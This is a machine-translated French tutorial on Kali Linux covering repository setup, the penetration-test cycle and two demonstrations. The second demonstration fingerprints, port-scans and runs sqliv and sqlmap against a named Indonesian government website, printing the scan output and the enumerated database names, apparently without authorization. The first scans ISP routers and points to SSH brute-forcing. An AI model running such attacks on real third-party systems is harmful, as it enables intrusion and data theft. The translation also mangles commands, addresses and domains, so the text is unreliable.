Tutoriel Kali Linux

Tutoriel Kali Linux
Si vous êtes un expert ou du moins familier avec Linux, les commandes et l'environnement, je viens d'installer Kali Linux sur votre machine, je voulais devenir un maître de Kali Linux ou un pirate éthique, vous êtes au bon endroit. Dans cet article, je couvrirai un tutoriel Kali Linux pour les utilisateurs de Linux qui ne connaissent pas déjà Kali et vous ferai démarrer sur certaines des techniques de base utilisées pour le piratage et les tests de sécurité tout en utilisant Kali.

Salut, je suis bimando, l'auteur de cet article. Si vous aimez cet article, veuillez consulter l'achat de mon livre Practical Ethical Hacking: pour les testeurs de pénétration avec Kali Linux. J'ai travaillé dur dessus avec l'équipe d'insouvrants Linux pour produire un produit de haute qualité, je sais que vous l'aimerez et apprenez beaucoup.


Qu'est-ce que Kali Linux?

Kali Linux, (Sortie pour la première fois le 13 mars 2013) qui était officiellement connu sous le nom de retour en arrière, développé par la société offensive de sécurité, est une distribution médico-légale et axée sur la sécurité basée sur la succursale de Debian's Testing. Kali Linux est conçu pour les tests de pénétration, la récupération des données et la détection des menaces à l'esprit. Le projet est passé à un modèle de libération de roulement plus tôt cette année dans un effort pour fournir des services de sécurité plus à jour aux utilisateurs de la distribution. Kali Linux est gratuit et sera toujours. Il a plus de 600 outils de test de pénétration inclus.

Pourquoi Kali Linux? Est-ce bon pour toi?

Kali Linux a gagné en popularité récemment. Et il y a une raison derrière ça. Le piratage est de retour en tant que cool à faire dans la culture populaire et cela peut être attribué de manière significative à la série télévisée M. Robot. M. La popularité du robot a aidé Kali Linux à obtenir de nouveaux utilisateurs. Les personnes ayant pratiquement aucune connaissance de Linux ou tout ce qui concerne la sécurité informatique essaie maintenant d'utiliser Kali comme principale distribution Linux.

«Notre distribution de tests de pénétration la plus avancée, jamais." - Développeurs Kali Linux. (Il est écrit sur la page principale de Kali.org tout en haut de la page.) Qu'obtenez-vous de cette déclaration? Remarquez-vous ceci: APTD (distribution avancée des tests de pénétration)? Il n'y a pas de terme de piratage ici littéralement. Kali Linux est le même que les autres distributions Linux. Il est simplement dit, il s'agit d'une distribution Linux remplie d'outils liés à la sécurité et ciblant les experts en sécurité du réseau et de l'informatique. Cependant, l'utilisation de Kali Linux ne se concentre que sur la sécurité et la criminalistique.

Une distribution Linux n'est rien d'autre qu'un paquet contenant le noyau Linux, un ensemble d'utilitaires et d'applications de base et certains paramètres par défaut. Ainsi, Kali Linux n'offre pas quelque chose d'unique dans ce sens, la plupart des outils fournis pourraient être installés sur n'importe quelle distribution Linux.

Kali Linux est spécifiquement conçu pour répondre aux exigences des tests de pénétration professionnelle et de l'audit de la sécurité. Il s'adresse à un sous-ensemble particulier d'utilisateurs de Linux. Pentents, pirates, etc. Ce n'est pas une distribution recommandée si vous vous attendez à Kali pour le bureau Linux à usage général pour le développement, la conception Web, les jeux, le bureau, etc. Kali pourrait vous relever des défis, même si vous êtes un utilisateur de Linux expérimenté.

Choses à faire après l'installation de Kali Linux

Après avoir installé Kali Linux, vous vous demandez peut-être quoi faire ensuite avec ça, à droite?. Tout le monde fait face à ce problème, ne vous inquiétez pas.

Étape 1: configurer le référentiel

Premièrement, vous le savez peut-être déjà, mais il est essentiel de définir correctement le référentiel. Comme je l'ai dit, le modèle de sortie de Kali Linux Rolling est dans le but de fournir des services de sécurité plus à jour aux utilisateurs de la distribution. Généralement, si vous avez Kali Linux fraîchement installé, le référentiel fait référence aux supports que vous utilisez pour installer. Pour résoudre ce problème, vous devez modifier le référentiel dans le référentiel officiel de Kali Linux. Le fichier requis est situé sous / etc / apt / sources.liste. Ouvrez le fichier avec l'éditeur de texte Leafpad et remplacez le référentiel par défaut dans ce référentiel officiel de roulement Kali:

deb http: // http.kali.org / kali kali-rolling principal contribute non libre
# Pour l'accès aux packages source, décommentez la ligne suivante
# deb-src http: // http.kali.org / kali kali-rolling principal contribute non libre

Étape 2: Mettre à jour et mettre à niveau votre Kali Linux

Après cette mise à jour et mise à niveau de votre système, synchroniser votre Kali Linux à la dernière version. Pour ce faire, ouvrez le terminal et tapez:

APT UPDATE -Y -Y && APT APPRODIANT -Y && APT DIST-OPDRADGE

La commande «APT Update» télécharge et récupère le package répertorie les informations des référentiels et les «met à jour» pour obtenir des informations sur les dernières versions de packages et leurs dépendances.

La commande «APT Mise à niveau» télécharge et installe une version plus récente des packages des packages Kali Linux installés tant qu'il n'a pas d'erreurs sur les dépendances.

Le «APT Dist-Opgrade» mettra à jour tous les packages vers la dernière version disponible, quoi qu'il arrive. Et installer et supprimer les dépendances au besoin (installez les dépendances pour satisfaire les packages, évidemment, mais supprimez également les dépendances qui sont devenues orphelines si un package mis à jour n'avait plus besoin de la dépendance.

Concept de test de pénétration de base avec Kali Linux

Après avoir réussi ces étapes, il y a trois principales choses que vous pourriez faire avec Kali Linux en fonction du système ciblé, notamment:

  1. Piratage de réseau sans fil - Piratage wifi, phisse, empoisonnement ARP, etc.
  2. Piratage d'applications Web - Injection SQL, contrefaçon de demande croisée (CSRF), Phising Web, etc.
  3. Piratage d'appareils - Exploiter la machine cible pour en prendre le contrôle.

Je n'inclus pas le piratage de l'IoT, cela ne signifie pas que Kali Linux n'a aucune capacité à cette fin. Mais, littéralement, il pourrait également appartenir au piratage d'appareils. Puisque l'appareil a une apparence physique et une forme. Dans ce tutoriel, j'ai couvert les connaissances de base d'eux. Depuis, Kali Linux est énorme, il ne correspond pas à un seul article!

Vous devez également savoir, le cycle de test de pénétration ou la procédure. Ils sont:

  1. Reconnaissance - Rassemblement d'informations
  2. Balayage
  3. Exploitation
  4. Post-exploitation

Piratage de réseau sans fil avec Kali Linux

En termes de piratage de réseau sans fil, la victime peut varier. Parce que les réseaux sans fil se composent de plusieurs choses, comme le FAI (fournisseur de services Internet), le routeur et ses «compagnons» (modem, hub, commutateur, etc.) et les clients (utilisateurs, CCTV, ordinateur distant, etc.). Ils ont également des possibilités vulnérables.

Internet est une grande agrégation complexe du matériel réseau, connecté ensemble par des passerelles. Suivi de l'itinéraire que vos paquets suivent est important pour savoir comment vous atteignez un certain nom d'hôte ou une adresse IP cible.

Kali Linux a un outil intégré appelé Traceroute. Traceroute utilise le champ «Time to Live» du protocole IP et tente de provoquer une réponse ICMP Time_exesed de chaque passerelle le long du chemin vers un hôte. Traceroute tente de retracer l'itinéraire qu'un paquet IP suivrait à un hôte Internet en lançant des paquets de sonde avec une petite réponse TTL (temps de vivre) puis une réponse ICMP «temps dépassée» d'une passerelle. Je vais vous donner et exemple comment tracer un routeur FAI utilisé pour gérer notre connexion à l'aide de Traceroute.

1. Reconnaissance

La collecte d'informations est le début de saut le plus important, ne manquez pas cette étape. À cette étape, notre objectif est de gagner autant que possibles des informations utiles que nous pourrions obtenir, puis ces informations sont utilisées pour d'autres étapes.

Tout d'abord, ouvrez un terminal et tapez cette commande pour commencer à tracer la «route» sur le site, dans ce cas, je définis le site sur Google.com.

Traceroute Google.com

2. Balayage

Une fois que nous aurons lancé les commandes, il réduira où notre paquet va en séquence. Comme vous pouvez le voir ci-dessus, j'ai obtenu 3 houblons dont l'un d'eux est mon serveur de FAI. La première IP sur la liste est mon routeur, qui agit comme une passerelle. Et les deux suivants appartiennent à mon FAI. Vérifions maintenant le service qu'ils exécutent en utilisant NMAP. Ainsi, les cibles que nous allons scanner sont dix.152.192.1 et dix.13.223.102. Dans le terminal, j'ai dirigé la commande suivante:

nmap -v -ss [IP Target] -pn

Décomposons l'argument de la commande:

-v = activer le mode de verbosité

-SS = Utiliser la technique de scan SYN TCP

-PN = Traitez tous les hôtes comme en ligne - ignorez la découverte de l'hôte

Et voici le résultat que nous avons obtenu.

Malheureusement, tous les ports sur dix.152.192.1 sont filtrés, cela signifie que toutes les connexions TCP entrantes sont bloquées par IDS ou pare-feu sur cette IP. Maintenant, prenons un autre scan à la deuxième cible.

3. Exploitation

Dans cette procédure, je ne suis pas destiné à mener la véritable exploitation, mais je vous montre comment. Sur la base du résultat de la numérisation NMAP ci-dessus, nous savons que cette IP a un serveur SSH fonctionnant sur le port 22, et il est ouvert. Il est ouvert pour être bruté, haha! Nous avons trouvé le trou, ce serveur SSH est le trou possible dans lequel nous pourrions essayer d'accéder. Il existe plusieurs outils dans Kali Linux qui prennent en charge les attaques de bruteforce ou de dictionnaire contre le protocole SSH. Le seul le plus populaire et le plus puissant est «Hydra».

OK, c'était une procédure de base effectuant un test de pénétration contre un serveur ciblé, qui dans notre exemple est mon serveur de FAI.

Les applications Web piratent avec Kali Linux

En fait, si vous êtes passionné à ce sujet, vous pouvez configurer votre environnement de piratage en installant DWVA (putain d'application Web vulnérable) dans votre Kali Linux. Il s'agit d'une application Web PHP / MySQL qui a un tas de trou vulnérable. Ses principaux objectifs sont d'être une aide pour les professionnels de la sécurité afin de tester leurs compétences et leurs outils dans un environnement juridique, et aider les développeurs Web à mieux comprendre les processus de sécurisation des applications Web. Vous pouvez obtenir DWVA gratuitement sur GitHub ici: https: // github.com / Ethicalhack3r / dvwa.

Pour l'instant, je vais vous montrer comment faire du piratage d'applications Web sur un vrai site. Mais promettez-moi que cela se limite à un but éducatif uniquement. Nous simulerons une véritable attaque sur un vrai site en utilisant l'injection SQL.

Prérequis

Outils couverts:

- Whatweb (préinstallé)

- NMAP (préinstallé)

- SQLIV (installer manuellement)

- SQLMAP (préinstallé)

Nous avons besoin d'un outil supplémentaire de plus disponible sur github ici: https: // github.com / hadesy2k / sqliv, installez-le d'abord sur notre Kali Linux. Cet outil nommé SQLIV qui est capable de faire une numérisation ciblée en fournissant un domaine spécifique (avec rampage). Tapez le terminal:

git clone https: // github.com / hadesy2k / sqliv.git
CD SQLIV && sudo python2 Configuration.py -i

Cible: www.trenggalekkab.aller.identifiant

1. Reconnaissance

Collecter autant d'informations utiles que possible. Nous pourrions ouvrir la page Web et détecter quelle application s'exécute sur ce site. Tout d'abord, vérifions quel type de site Web il s'agit. Nous allons utiliser «whatweb» pour faire ça.

Whatweb www.trenggalekkab.aller.identifiant

Comme vous pouvez le voir ci-dessus, la cible est située en Indonésie. Ça marche Apache v2.2.27 sur son serveur Web et a également Php v5.4.31, il a une adresse IP 103.247.21.142. D'accord, prenez une note de ça. Vous devrez peut-être visiter sa page Web, à la recherche du fichier ou de la page construit, des paramètres d'URL ou même du formulaire de connexion. Pour l'instant, nous avons besoin de cette adresse IP pour la prochaine étape qui scanne.

2. Balayage

Comme avant, nous utilisons à nouveau NMAP pour scanner les ports et les services exécutés sur la cible.

NMAP -V -SS 103.247.21.142

Et voici le résultat que nous avons obtenu:

SCAN SYN FERMÉ SYN à 21:22, 261.93s écoulés (1000 ports au total)
Rapport de numérisation NMAP pour IP-103-247-21-142.wifian.filet.id (103.247.21.142)
L'hôte est en place (0.Latence 069S).
Non montré: 985 ports fermés
Service d'État de l'État
21 / TCP Open FTP
25 / TCP Open SMTP
Domaine ouvert 53 / TCP
80 / TCP Open HTTP
110 / TCP Open POP3
111 / TCP Open RPCBIND
143 / TCP Open IMAP
212 / TCP Open ANET
443 / TCP Open HTTPS
465 / TCP Open SMTPS
Soumission ouverte 587 / TCP
993 / TCP Open IMAPS
995 / TCP Open POP3S
3128 / TCP filtré Squid-http
3306 / TCP Open MySQL

Il y a un tas de ports ouverts qui gèrent chaque service sur la cible, mais celui qui semble «accrocheur» est que le service MySQL sur le port 3306. Il est indiqué que ce site utilise mysql pour gérer leurs informations dans les bases de données. Ensuite, je me demande s'il y a des vulnérabilités d'injection SQL sur ce site. Donc, je scanne à nouveau le site en utilisant SQLIV que nous venons d'installer. J'ai tapé la commande:

sqliv -t www.trenggalekkab.aller.identifiant

Nous avons trouvé 2 URL vulnérables SQL possibles sur ce site. Prenez note de ces URL.

3. Exploitation

OK, nous avons des URL vulnérables SQL et prête pour l'exécution. Pour ce faire, nous utiliserons SQLMAP. La syntaxe est:

SQLMAP «[URL vulnérable]» - DBS

La commande devrait ressembler à ceci:

sqlmap -u "http: // www.trenggalekkab.aller.id / berita.php?page = 208 "--DBS

L'argument «-dbs» est de dire à SQLMAP pour obtenir des bases de données cibles. Voici la sortie que nous avons obtenue:

[Info] Les SGBD back-end sont MySQL
Technologie des applications Web: PHP 5.4.31, Apache 2.2.27
DBMS Back-end: MySQL 5
[21:46:04] [Info] Remplir les noms de base de données
[21:46:04] [Info] La requête SQL utilisée renvoie 2 entrées
[21:46:04] [Info] Reprise: Information_schema
[21:46:04] [Info] Reprise: Trengkab_Trg
Bases de données disponibles [2]:
[*] Information_schema
[*] TRENGKAB_TRG

SQLMAP a trouvé 2 bases de données, mais une seule d'entre elles qui contient des données sensibles, comme un compte d'identification d'administration. C'est sur "Trengkab_Trg". Après avoir trouvé les bases de données, il y a encore une autre étape que nous devrions faire. C'est-à-dire trouver les tables et les colonnes et la dernière étape consiste à vider les données. Je ne vous montrerai pas comment ici dans cette section, en utilisant cette cible. Au moins, vous connaissez l'idée de base sur le cycle d'attaque et utilisez des outils.

Piratage d'appareils

Dans un futur article sur ce site, nous couvrirons le piratage des appareils, resterons à l'écoute. En tant qu'argroise avant.